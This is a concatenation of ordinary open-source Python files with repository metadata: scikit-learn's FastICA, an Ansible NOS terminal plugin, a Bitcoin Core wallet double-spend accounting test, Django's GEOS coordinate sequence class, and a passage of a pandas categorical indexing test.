# Bertrand Thirion, Alexandre Gramfort, Denis A. Engemann
# License: BSD 3 clause
import warnings
import numpy as np
from scipy import linalg
from ..base import BaseEstimator, TransformerMixin
from ..externals import six
from ..externals.six import moves
from ..utils import check_array, as_float_array, check_random_state
from ..utils.extmath import fast_dot
from ..utils.validation import check_is_fitted
__all__ = ['fastica', 'FastICA']
def _gs_decorrelation(w, W, j):
"""
Orthonormalize w wrt the first j rows of W
Parameters
----------
w : ndarray of shape(n)
Array to be orthogonalized
W : ndarray of shape(p, n)
Null space definition
j : int < p
The no of (from the first) rows of Null space W wrt which w is
orthogonalized.
Notes
-----
Assumes that W is orthogonal
w changed in place
"""
w -= np.dot(np.dot(w, W[:j].T), W[:j])
return w
def _sym_decorrelation(W):
""" Symmetric decorrelation
i.e. W <- (W * W.T) ^{-1/2} * W
"""
s, u = linalg.eigh(np.dot(W, W.T))
# u (resp. s) contains the eigenvectors (resp. square roots of
# the eigenvalues) of W * W.T
return np.dot(np.dot(u * (1. / np.sqrt(s)), u.T), W)
def _ica_def(X, tol, g, fun_args, max_iter, w_init):
"""Deflationary FastICA using fun approx to neg-entropy function
Used internally by FastICA.
"""
n_components = w_init.shape[0]
W = np.zeros((n_components, n_components), dtype=X.dtype)
n_iter = []
# j is the index of the extracted component
for j in range(n_components):
w = w_init[j, :].copy()
w /= np.sqrt((w ** 2).sum())
for i in moves.xrange(max_iter):
gwtx, g_wtx = g(fast_dot(w.T, X), fun_args)
w1 = (X * gwtx).mean(axis=1) - g_wtx.mean() * w
_gs_decorrelation(w1, W, j)
w1 /= np.sqrt((w1 ** 2).sum())
lim = np.abs(np.abs((w1 * w).sum()) - 1)
w = w1
if lim < tol:
break
n_iter.append(i + 1)
W[j, :] = w
return W, max(n_iter)
def _ica_par(X, tol, g, fun_args, max_iter, w_init):
"""Parallel FastICA.
Used internally by FastICA --main loop
"""
W = _sym_decorrelation(w_init)
del w_init
p_ = float(X.shape[1])
for ii in moves.xrange(max_iter):
gwtx, g_wtx = g(fast_dot(W, X), fun_args)
W1 = _sym_decorrelation(fast_dot(gwtx, X.T) / p_
- g_wtx[:, np.newaxis] * W)
del gwtx, g_wtx
# builtin max, abs are faster than numpy counter parts.
lim = max(abs(abs(np.diag(fast_dot(W1, W.T))) - 1))
W = W1
if lim < tol:
break
else:
warnings.warn('FastICA did not converge. Consider increasing '
'tolerance or the maximum number of iterations.')
return W, ii + 1
# Some standard non-linear functions.
# XXX: these should be optimized, as they can be a bottleneck.
def _logcosh(x, fun_args=None):
alpha = fun_args.get('alpha', 1.0) # comment it out?
x *= alpha
gx = np.tanh(x, x) # apply the tanh inplace
g_x = np.empty(x.shape[0])
# XXX compute in chunks to avoid extra allocation
for i, gx_i in enumerate(gx): # please don't vectorize.
g_x[i] = (alpha * (1 - gx_i ** 2)).mean()
return gx, g_x
def _exp(x, fun_args):
exp = np.exp(-(x ** 2) / 2)
gx = x * exp
g_x = (1 - x ** 2) * exp
return gx, g_x.mean(axis=-1)
def _cube(x, fun_args):
return x ** 3, (3 * x ** 2).mean(axis=-1)
def fastica(X, n_components=None, algorithm="parallel", whiten=True,
fun="logcosh", fun_args=None, max_iter=200, tol=1e-04, w_init=None,
random_state=None, return_X_mean=False, compute_sources=True,
return_n_iter=False):
"""Perform Fast Independent Component Analysis.
Read more in the :ref:`User Guide <ICA>`.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
n_components : int, optional
Number of components to extract. If None no dimension reduction
is performed.
algorithm : {'parallel', 'deflation'}, optional
Apply a parallel or deflational FASTICA algorithm.
whiten : boolean, optional
If True perform an initial whitening of the data.
If False, the data is assumed to have already been
preprocessed: it should be centered, normed and white.
Otherwise you will get incorrect results.
In this case the parameter n_components will be ignored.
fun : string or function, optional. Default: 'logcosh'
The functional form of the G function used in the
approximation to neg-entropy. Could be either 'logcosh', 'exp',
or 'cube'.
You can also provide your own function. It should return a tuple
containing the value of the function, and of its derivative, in the
point. Example:
def my_g(x):
return x ** 3, 3 * x ** 2
fun_args : dictionary, optional
Arguments to send to the functional form.
If empty or None and if fun='logcosh', fun_args will take value
{'alpha' : 1.0}
max_iter : int, optional
Maximum number of iterations to perform.
tol: float, optional
A positive scalar giving the tolerance at which the
un-mixing matrix is considered to have converged.
w_init : (n_components, n_components) array, optional
Initial un-mixing array of dimension (n.comp,n.comp).
If None (default) then an array of normal r.v.'s is used.
random_state : int or RandomState
Pseudo number generator state used for random sampling.
return_X_mean : bool, optional
If True, X_mean is returned too.
compute_sources : bool, optional
If False, sources are not computed, but only the rotation matrix.
This can save memory when working with big data. Defaults to True.
return_n_iter : bool, optional
Whether or not to return the number of iterations.
Returns
-------
K : array, shape (n_components, n_features) | None.
If whiten is 'True', K is the pre-whitening matrix that projects data
onto the first n_components principal components. If whiten is 'False',
K is 'None'.
W : array, shape (n_components, n_components)
Estimated un-mixing matrix.
The mixing matrix can be obtained by::
w = np.dot(W, K.T)
A = w.T * (w * w.T).I
S : array, shape (n_samples, n_components) | None
Estimated source matrix
X_mean : array, shape (n_features, )
The mean over features. Returned only if return_X_mean is True.
n_iter : int
If the algorithm is "deflation", n_iter is the
maximum number of iterations run across all components. Else
they are just the number of iterations taken to converge. This is
returned only when return_n_iter is set to `True`.
Notes
-----
The data matrix X is considered to be a linear combination of
non-Gaussian (independent) components i.e. X = AS where columns of S
contain the independent components and A is a linear mixing
matrix. In short ICA attempts to `un-mix' the data by estimating an
un-mixing matrix W where ``S = W K X.``
This implementation was originally made for data of shape
[n_features, n_samples]. Now the input is transposed
before the algorithm is applied. This makes it slightly
faster for Fortran-ordered input.
Implemented using FastICA:
`A. Hyvarinen and E. Oja, Independent Component Analysis:
Algorithms and Applications, Neural Networks, 13(4-5), 2000,
pp. 411-430`
"""
random_state = check_random_state(random_state)
fun_args = {} if fun_args is None else fun_args
# make interface compatible with other decompositions
# a copy is required only for non whitened data
X = check_array(X, copy=whiten).T
alpha = fun_args.get('alpha', 1.0)
if not 1 <= alpha <= 2:
raise ValueError('alpha must be in [1,2]')
if fun == 'logcosh':
g = _logcosh
elif fun == 'exp':
g = _exp
elif fun == 'cube':
g = _cube
elif callable(fun):
def g(x, fun_args):
return fun(x, **fun_args)
else:
exc = ValueError if isinstance(fun, six.string_types) else TypeError
raise exc("Unknown function %r;"
" should be one of 'logcosh', 'exp', 'cube' or callable"
% fun)
n, p = X.shape
if not whiten and n_components is not None:
n_components = None
warnings.warn('Ignoring n_components with whiten=False.')
if n_components is None:
n_components = min(n, p)
if (n_components > min(n, p)):
n_components = min(n, p)
print("n_components is too large: it will be set to %s" % n_components)
if whiten:
# Centering the columns (ie the variables)
X_mean = X.mean(axis=-1)
X -= X_mean[:, np.newaxis]
# Whitening and preprocessing by PCA
u, d, _ = linalg.svd(X, full_matrices=False)
del _
K = (u / d).T[:n_components] # see (6.33) p.140
del u, d
X1 = np.dot(K, X)
# see (13.6) p.267 Here X1 is white and data
# in X has been projected onto a subspace by PCA
X1 *= np.sqrt(p)
else:
# X must be casted to floats to avoid typing issues with numpy
# 2.0 and the line below
X1 = as_float_array(X, copy=False) # copy has been taken care of
if w_init is None:
w_init = np.asarray(random_state.normal(size=(n_components,
n_components)), dtype=X1.dtype)
else:
w_init = np.asarray(w_init)
if w_init.shape != (n_components, n_components):
raise ValueError('w_init has invalid shape -- should be %(shape)s'
% {'shape': (n_components, n_components)})
kwargs = {'tol': tol,
'g': g,
'fun_args': fun_args,
'max_iter': max_iter,
'w_init': w_init}
if algorithm == 'parallel':
W, n_iter = _ica_par(X1, **kwargs)
elif algorithm == 'deflation':
W, n_iter = _ica_def(X1, **kwargs)
else:
raise ValueError('Invalid algorithm: must be either `parallel` or'
' `deflation`.')
del X1
if whiten:
if compute_sources:
S = fast_dot(fast_dot(W, K), X).T
else:
S = None
if return_X_mean:
if return_n_iter:
return K, W, S, X_mean, n_iter
else:
return K, W, S, X_mean
else:
if return_n_iter:
return K, W, S, n_iter
else:
return K, W, S
else:
if compute_sources:
S = fast_dot(W, X).T
else:
S = None
if return_X_mean:
if return_n_iter:
return None, W, S, None, n_iter
else:
return None, W, S, None
else:
if return_n_iter:
return None, W, S, n_iter
else:
return None, W, S
class FastICA(BaseEstimator, TransformerMixin):
"""FastICA: a fast algorithm for Independent Component Analysis.
Read more in the :ref:`User Guide <ICA>`.
Parameters
----------
n_components : int, optional
Number of components to use. If none is passed, all are used.
algorithm : {'parallel', 'deflation'}
Apply parallel or deflational algorithm for FastICA.
whiten : boolean, optional
If whiten is false, the data is already considered to be
whitened, and no whitening is performed.
fun : string or function, optional. Default: 'logcosh'
The functional form of the G function used in the
approximation to neg-entropy. Could be either 'logcosh', 'exp',
or 'cube'.
You can also provide your own function. It should return a tuple
containing the value of the function, and of its derivative, in the
point. Example:
def my_g(x):
return x ** 3, 3 * x ** 2
fun_args : dictionary, optional
Arguments to send to the functional form.
If empty and if fun='logcosh', fun_args will take value
{'alpha' : 1.0}.
max_iter : int, optional
Maximum number of iterations during fit.
tol : float, optional
Tolerance on update at each iteration.
w_init : None of an (n_components, n_components) ndarray
The mixing matrix to be used to initialize the algorithm.
random_state : int or RandomState
Pseudo number generator state used for random sampling.
Attributes
----------
components_ : 2D array, shape (n_components, n_features)
The unmixing matrix.
mixing_ : array, shape (n_features, n_components)
The mixing matrix.
n_iter_ : int
If the algorithm is "deflation", n_iter is the
maximum number of iterations run across all components. Else
they are just the number of iterations taken to converge.
Notes
-----
Implementation based on
`A. Hyvarinen and E. Oja, Independent Component Analysis:
Algorithms and Applications, Neural Networks, 13(4-5), 2000,
pp. 411-430`
"""
def __init__(self, n_components=None, algorithm='parallel', whiten=True,
fun='logcosh', fun_args=None, max_iter=200, tol=1e-4,
w_init=None, random_state=None):
super(FastICA, self).__init__()
self.n_components = n_components
self.algorithm = algorithm
self.whiten = whiten
self.fun = fun
self.fun_args = fun_args
self.max_iter = max_iter
self.tol = tol
self.w_init = w_init
self.random_state = random_state
def _fit(self, X, compute_sources=False):
"""Fit the model
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
compute_sources : bool
If False, sources are not computes but only the rotation matrix.
This can save memory when working with big data. Defaults to False.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
fun_args = {} if self.fun_args is None else self.fun_args
whitening, unmixing, sources, X_mean, self.n_iter_ = fastica(
X=X, n_components=self.n_components, algorithm=self.algorithm,
whiten=self.whiten, fun=self.fun, fun_args=fun_args,
max_iter=self.max_iter, tol=self.tol, w_init=self.w_init,
random_state=self.random_state, return_X_mean=True,
compute_sources=compute_sources, return_n_iter=True)
if self.whiten:
self.components_ = np.dot(unmixing, whitening)
self.mean_ = X_mean
self.whitening_ = whitening
else:
self.components_ = unmixing
self.mixing_ = linalg.pinv(self.components_)
if compute_sources:
self.__sources = sources
return sources
def fit_transform(self, X, y=None):
"""Fit the model and recover the sources from X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
return self._fit(X, compute_sources=True)
def fit(self, X, y=None):
"""Fit the model to X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
self
"""
self._fit(X, compute_sources=False)
return self
def transform(self, X, y=None, copy=True):
"""Recover the sources from X (apply the unmixing matrix).
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data to transform, where n_samples is the number of samples
and n_features is the number of features.
copy : bool (optional)
If False, data passed to fit are overwritten. Defaults to True.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
check_is_fitted(self, 'mixing_')
X = check_array(X, copy=copy)
if self.whiten:
X -= self.mean_
return fast_dot(X, self.components_.T)
def inverse_transform(self, X, copy=True):
"""Transform the sources back to the mixed data (apply mixing matrix).
Parameters
----------
X : array-like, shape (n_samples, n_components)
Sources, where n_samples is the number of samples
and n_components is the number of components.
copy : bool (optional)
If False, data passed to fit are overwritten. Defaults to True.
Returns
-------
X_new : array-like, shape (n_samples, n_features)
"""
check_is_fitted(self, 'mixing_')
if copy:
X = X.copy()
X = fast_dot(X, self.mixing_.T)
if self.whiten:
X += self.mean_
return X
|
bsd-3-clause
|
EvanK/ansible
|
lib/ansible/plugins/terminal/nos.py
|
177
|
1962
|
#
# (c) 2018 Extreme Networks Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
from ansible.errors import AnsibleConnectionFailure
from ansible.plugins.terminal import TerminalBase
class TerminalModule(TerminalBase):
terminal_stdout_re = [
re.compile(br"([\r\n]|(\x1b\[\?7h))[\w\+\-\.:\/\[\]]+(?:\([^\)]+\)){0,3}(?:[>#]) ?$")
]
terminal_stderr_re = [
re.compile(br"% ?Error"),
# re.compile(br"^% \w+", re.M),
re.compile(br"% ?Bad secret"),
re.compile(br"[\r\n%] Bad passwords"),
re.compile(br"invalid input", re.I),
re.compile(br"(?:incomplete|ambiguous) command", re.I),
re.compile(br"connection timed out", re.I),
re.compile(br"[^\r\n]+ not found"),
re.compile(br"'[^']' +returned error code: ?\d+"),
re.compile(br"Bad mask", re.I),
re.compile(br"% ?(\S+) ?overlaps with ?(\S+)", re.I),
re.compile(br"[%\S] ?Informational: ?[\s]+", re.I),
re.compile(br"syntax error: unknown argument.", re.I)
]
def on_open_shell(self):
try:
self._exec_cli_command(u'terminal length 0')
except AnsibleConnectionFailure:
raise AnsibleConnectionFailure('unable to set terminal parameters')
|
gpl-3.0
|
jtimon/bitcoin
|
test/functional/wallet_txn_doublespend.py
|
6
|
6036
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet accounts properly when there is a double-spend conflict."""
from decimal import Decimal
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
disconnect_nodes,
find_output,
)
class TxnMallTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
super().setup_network()
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
def run_test(self):
# All nodes should start with 1,250 BTC:
starting_balance = 1250
# All nodes should be out of IBD.
# If the nodes are not all out of IBD, that can interfere with
# blockchain sync later in the test when nodes are connected, due to
# timing issues.
for n in self.nodes:
assert n.getblockchaininfo()["initialblockdownload"] == False
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar addresses:
node0_address_foo = self.nodes[0].getnewaddress()
fund_foo_txid = self.nodes[0].sendtoaddress(node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress()
fund_bar_txid = self.nodes[0].sendtoaddress(node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(),
starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress()
# First: use raw transaction API to send 1240 BTC to node1_address,
# but don't broadcast:
doublespend_fee = Decimal('-.02')
rawtx_input_0 = {}
rawtx_input_0["txid"] = fund_foo_txid
rawtx_input_0["vout"] = find_output(self.nodes[0], fund_foo_txid, 1219)
rawtx_input_1 = {}
rawtx_input_1["txid"] = fund_bar_txid
rawtx_input_1["vout"] = find_output(self.nodes[0], fund_bar_txid, 29)
inputs = [rawtx_input_0, rawtx_input_1]
change_address = self.nodes[0].getnewaddress()
outputs = {}
outputs[node1_address] = 1240
outputs[change_address] = 1248 - 1240 + doublespend_fee
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
doublespend = self.nodes[0].signrawtransactionwithwallet(rawtx)
assert_equal(doublespend["complete"], True)
# Create two spends using 1 50 BTC coin each
txid1 = self.nodes[0].sendtoaddress(node1_address, 40)
txid2 = self.nodes[0].sendtoaddress(node1_address, 20)
# Have node0 mine a block:
if (self.options.mine_block):
self.nodes[0].generate(1)
self.sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50BTC for another
# matured block, minus 40, minus 20, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block:
expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance(), starting_balance - tx1["amount"] - tx2["amount"])
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Now give doublespend and its parents to miner:
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
doublespend_txid = self.nodes[2].sendrawtransaction(doublespend["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].generate(1) # Mine another block to make sure we sync
self.sync_blocks()
assert_equal(self.nodes[0].gettransaction(doublespend_txid)["confirmations"], 2)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Both transactions should be conflicted
assert_equal(tx1["confirmations"], -2)
assert_equal(tx2["confirmations"], -2)
# Node0's total balance should be starting balance, plus 100BTC for
# two more matured blocks, minus 1240 for the double-spend, plus fees (which are
# negative):
expected = starting_balance + 100 - 1240 + fund_foo_tx["fee"] + fund_bar_tx["fee"] + doublespend_fee
assert_equal(self.nodes[0].getbalance(), expected)
# Node1's balance should be its initial balance (1250 for 25 block rewards) plus the doublespend:
assert_equal(self.nodes[1].getbalance(), 1250 + 1240)
if __name__ == '__main__':
TxnMallTest().main()
|
mit
|
Amechi101/concepteur-market-app
|
venv/lib/python2.7/site-packages/django/contrib/gis/geos/coordseq.py
|
219
|
5438
|
"""
This module houses the GEOSCoordSeq object, which is used internally
by GEOSGeometry to house the actual coordinates of the Point,
LineString, and LinearRing geometries.
"""
from ctypes import c_double, c_uint, byref
from django.contrib.gis.geos.base import GEOSBase, numpy
from django.contrib.gis.geos.error import GEOSException, GEOSIndexError
from django.contrib.gis.geos.libgeos import CS_PTR
from django.contrib.gis.geos import prototypes as capi
from django.utils.six.moves import xrange
class GEOSCoordSeq(GEOSBase):
"The internal representation of a list of coordinates inside a Geometry."
ptr_type = CS_PTR
#### Python 'magic' routines ####
def __init__(self, ptr, z=False):
"Initializes from a GEOS pointer."
if not isinstance(ptr, CS_PTR):
raise TypeError('Coordinate sequence should initialize with a CS_PTR.')
self._ptr = ptr
self._z = z
def __iter__(self):
"Iterates over each point in the coordinate sequence."
for i in xrange(self.size):
yield self[i]
def __len__(self):
"Returns the number of points in the coordinate sequence."
return int(self.size)
def __str__(self):
"Returns the string representation of the coordinate sequence."
return str(self.tuple)
def __getitem__(self, index):
"Returns the coordinate sequence value at the given index."
coords = [self.getX(index), self.getY(index)]
if self.dims == 3 and self._z:
coords.append(self.getZ(index))
return tuple(coords)
def __setitem__(self, index, value):
"Sets the coordinate sequence value at the given index."
# Checking the input value
if isinstance(value, (list, tuple)):
pass
elif numpy and isinstance(value, numpy.ndarray):
pass
else:
raise TypeError('Must set coordinate with a sequence (list, tuple, or numpy array).')
# Checking the dims of the input
if self.dims == 3 and self._z:
n_args = 3
set_3d = True
else:
n_args = 2
set_3d = False
if len(value) != n_args:
raise TypeError('Dimension of value does not match.')
# Setting the X, Y, Z
self.setX(index, value[0])
self.setY(index, value[1])
if set_3d: self.setZ(index, value[2])
#### Internal Routines ####
def _checkindex(self, index):
"Checks the given index."
sz = self.size
if (sz < 1) or (index < 0) or (index >= sz):
raise GEOSIndexError('invalid GEOS Geometry index: %s' % str(index))
def _checkdim(self, dim):
"Checks the given dimension."
if dim < 0 or dim > 2:
raise GEOSException('invalid ordinate dimension "%d"' % dim)
#### Ordinate getting and setting routines ####
def getOrdinate(self, dimension, index):
"Returns the value for the given dimension and index."
self._checkindex(index)
self._checkdim(dimension)
return capi.cs_getordinate(self.ptr, index, dimension, byref(c_double()))
def setOrdinate(self, dimension, index, value):
"Sets the value for the given dimension and index."
self._checkindex(index)
self._checkdim(dimension)
capi.cs_setordinate(self.ptr, index, dimension, value)
def getX(self, index):
"Get the X value at the index."
return self.getOrdinate(0, index)
def setX(self, index, value):
"Set X with the value at the given index."
self.setOrdinate(0, index, value)
def getY(self, index):
"Get the Y value at the given index."
return self.getOrdinate(1, index)
def setY(self, index, value):
"Set Y with the value at the given index."
self.setOrdinate(1, index, value)
def getZ(self, index):
"Get Z with the value at the given index."
return self.getOrdinate(2, index)
def setZ(self, index, value):
"Set Z with the value at the given index."
self.setOrdinate(2, index, value)
### Dimensions ###
@property
def size(self):
"Returns the size of this coordinate sequence."
return capi.cs_getsize(self.ptr, byref(c_uint()))
@property
def dims(self):
"Returns the dimensions of this coordinate sequence."
return capi.cs_getdims(self.ptr, byref(c_uint()))
@property
def hasz(self):
"""
Returns whether this coordinate sequence is 3D. This property value is
inherited from the parent Geometry.
"""
return self._z
### Other Methods ###
def clone(self):
"Clones this coordinate sequence."
return GEOSCoordSeq(capi.cs_clone(self.ptr), self.hasz)
@property
def kml(self):
"Returns the KML representation for the coordinates."
# Getting the substitution string depending on whether the coordinates have
# a Z dimension.
if self.hasz: substr = '%s,%s,%s '
else: substr = '%s,%s,0 '
return '<coordinates>%s</coordinates>' % \
''.join([substr % self[i] for i in xrange(len(self))]).strip()
@property
def tuple(self):
"Returns a tuple version of this coordinate sequence."
n = self.size
if n == 1: return self[0]
else: return tuple([self[i] for i in xrange(n)])
|
mit
|
Winand/pandas
|
pandas/tests/indexing/test_categorical.py
|
5
|
17421
|
# -*- coding: utf-8 -*-
import pytest
import pandas as pd
import numpy as np
from pandas import (Series, DataFrame, Timestamp,
Categorical, CategoricalIndex)
from pandas.util.testing import assert_series_equal, assert_frame_equal
from pandas.util import testing as tm
class TestCategoricalIndex(object):
def setup_method(self, method):
self.df = DataFrame({'A': np.arange(6, dtype='int64'),
'B': Series(list('aabbca')).astype(
'category', categories=list(
'cab'))}).set_index('B')
self.df2 = DataFrame({'A': np.arange(6, dtype='int64'),
'B': Series(list('aabbca')).astype(
'category', categories=list(
'cabe'))}).set_index('B')
self.df3 = DataFrame({'A': np.arange(6, dtype='int64'),
'B': (Series([1, 1, 2, 1, 3, 2])
.astype('category', categories=[3, 2, 1],
ordered=True))}).set_index('B')
self.df4 = DataFrame({'A': np.arange(6, dtype='int64'),
'B': (Series([1, 1, 2, 1, 3, 2])
.astype('category', categories=[3, 2, 1],
ordered=False))}).set_index('B')
def test_loc_scalar(self):
result = self.df.loc['a']
expected = (DataFrame({'A': [0, 1, 5],
'B': (Series(list('aaa'))
.astype('category',
categories=list('cab')))})
.set_index('B'))
assert_frame_equal(result, expected)
df = self.df.copy()
df.loc['a'] = 20
expected = (DataFrame({'A': [20, 20, 2, 3, 4, 20],
'B': (Series(list('aabbca'))
.astype('category',
categories=list('cab')))})
.set_index('B'))
assert_frame_equal(df, expected)
# value not in the categories
pytest.raises(KeyError, lambda: df.loc['d'])
def f():
df.loc['d'] = 10
pytest.raises(TypeError, f)
def f():
df.loc['d', 'A'] = 10
pytest.raises(TypeError, f)
def f():
df.loc['d', 'C'] = 10
pytest.raises(TypeError, f)
def test_getitem_scalar(self):
cats = Categorical([Timestamp('12-31-1999'),
Timestamp('12-31-2000')])
s = Series([1, 2], index=cats)
expected = s.iloc[0]
result = s[cats[0]]
assert result == expected
def test_loc_listlike(self):
# list of labels
result = self.df.loc[['c', 'a']]
expected = self.df.iloc[[4, 0, 1, 5]]
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.loc[['a', 'b', 'e']]
exp_index = CategoricalIndex(
list('aaabbe'), categories=list('cabe'), name='B')
expected = DataFrame({'A': [0, 1, 5, 2, 3, np.nan]}, index=exp_index)
assert_frame_equal(result, expected, check_index_type=True)
# element in the categories but not in the values
pytest.raises(KeyError, lambda: self.df2.loc['e'])
# assign is ok
df = self.df2.copy()
df.loc['e'] = 20
result = df.loc[['a', 'b', 'e']]
exp_index = CategoricalIndex(
list('aaabbe'), categories=list('cabe'), name='B')
expected = DataFrame({'A': [0, 1, 5, 2, 3, 20]}, index=exp_index)
assert_frame_equal(result, expected)
df = self.df2.copy()
result = df.loc[['a', 'b', 'e']]
exp_index = CategoricalIndex(
list('aaabbe'), categories=list('cabe'), name='B')
expected = DataFrame({'A': [0, 1, 5, 2, 3, np.nan]}, index=exp_index)
assert_frame_equal(result, expected, check_index_type=True)
# not all labels in the categories
pytest.raises(KeyError, lambda: self.df2.loc[['a', 'd']])
def test_loc_listlike_dtypes(self):
# GH 11586
# unique categories and codes
index = CategoricalIndex(['a', 'b', 'c'])
df = DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]}, index=index)
# unique slice
res = df.loc[['a', 'b']]
exp_index = CategoricalIndex(['a', 'b'],
categories=index.categories)
exp = DataFrame({'A': [1, 2], 'B': [4, 5]}, index=exp_index)
tm.assert_frame_equal(res, exp, check_index_type=True)
# duplicated slice
res = df.loc[['a', 'a', 'b']]
exp_index = CategoricalIndex(['a', 'a', 'b'],
categories=index.categories)
exp = DataFrame({'A': [1, 1, 2], 'B': [4, 4, 5]}, index=exp_index)
tm.assert_frame_equal(res, exp, check_index_type=True)
with tm.assert_raises_regex(
KeyError,
'a list-indexer must only include values that are '
'in the categories'):
df.loc[['a', 'x']]
# duplicated categories and codes
index = CategoricalIndex(['a', 'b', 'a'])
df = DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]}, index=index)
# unique slice
res = df.loc[['a', 'b']]
exp = DataFrame({'A': [1, 3, 2],
'B': [4, 6, 5]},
index=CategoricalIndex(['a', 'a', 'b']))
tm.assert_frame_equal(res, exp, check_index_type=True)
# duplicated slice
res = df.loc[['a', 'a', 'b']]
exp = DataFrame(
{'A': [1, 3, 1, 3, 2],
'B': [4, 6, 4, 6, 5
]}, index=CategoricalIndex(['a', 'a', 'a', 'a', 'b']))
tm.assert_frame_equal(res, exp, check_index_type=True)
with tm.assert_raises_regex(
KeyError,
'a list-indexer must only include values '
'that are in the categories'):
df.loc[['a', 'x']]
# contains unused category
index = CategoricalIndex(
['a', 'b', 'a', 'c'], categories=list('abcde'))
df = DataFrame({'A': [1, 2, 3, 4], 'B': [5, 6, 7, 8]}, index=index)
res = df.loc[['a', 'b']]
exp = DataFrame({'A': [1, 3, 2], 'B': [5, 7, 6]},
index=CategoricalIndex(['a', 'a', 'b'],
categories=list('abcde')))
tm.assert_frame_equal(res, exp, check_index_type=True)
res = df.loc[['a', 'e']]
exp = DataFrame({'A': [1, 3, np.nan], 'B': [5, 7, np.nan]},
index=CategoricalIndex(['a', 'a', 'e'],
categories=list('abcde')))
tm.assert_frame_equal(res, exp, check_index_type=True)
# duplicated slice
res = df.loc[['a', 'a', 'b']]
exp = DataFrame({'A': [1, 3, 1, 3, 2], 'B': [5, 7, 5, 7, 6]},
index=CategoricalIndex(['a', 'a', 'a', 'a', 'b'],
categories=list('abcde')))
tm.assert_frame_equal(res, exp, check_index_type=True)
with tm.assert_raises_regex(
KeyError,
'a list-indexer must only include values '
'that are in the categories'):
df.loc[['a', 'x']]
def test_get_indexer_array(self):
arr = np.array([Timestamp('1999-12-31 00:00:00'),
Timestamp('2000-12-31 00:00:00')], dtype=object)
cats = [Timestamp('1999-12-31 00:00:00'),
Timestamp('2000-12-31 00:00:00')]
ci = CategoricalIndex(cats,
categories=cats,
ordered=False, dtype='category')
result = ci.get_indexer(arr)
expected = np.array([0, 1], dtype='intp')
tm.assert_numpy_array_equal(result, expected)
def test_getitem_with_listlike(self):
# GH 16115
cats = Categorical([Timestamp('12-31-1999'),
Timestamp('12-31-2000')])
expected = DataFrame([[1, 0], [0, 1]], dtype='uint8',
index=[0, 1], columns=cats)
dummies = pd.get_dummies(cats)
result = dummies[[c for c in dummies.columns]]
assert_frame_equal(result, expected)
def test_ix_categorical_index(self):
# GH 12531
df = DataFrame(np.random.randn(3, 3),
index=list('ABC'), columns=list('XYZ'))
cdf = df.copy()
cdf.index = CategoricalIndex(df.index)
cdf.columns = CategoricalIndex(df.columns)
expect = Series(df.loc['A', :], index=cdf.columns, name='A')
assert_series_equal(cdf.loc['A', :], expect)
expect = Series(df.loc[:, 'X'], index=cdf.index, name='X')
assert_series_equal(cdf.loc[:, 'X'], expect)
exp_index = CategoricalIndex(list('AB'), categories=['A', 'B', 'C'])
expect = DataFrame(df.loc[['A', 'B'], :], columns=cdf.columns,
index=exp_index)
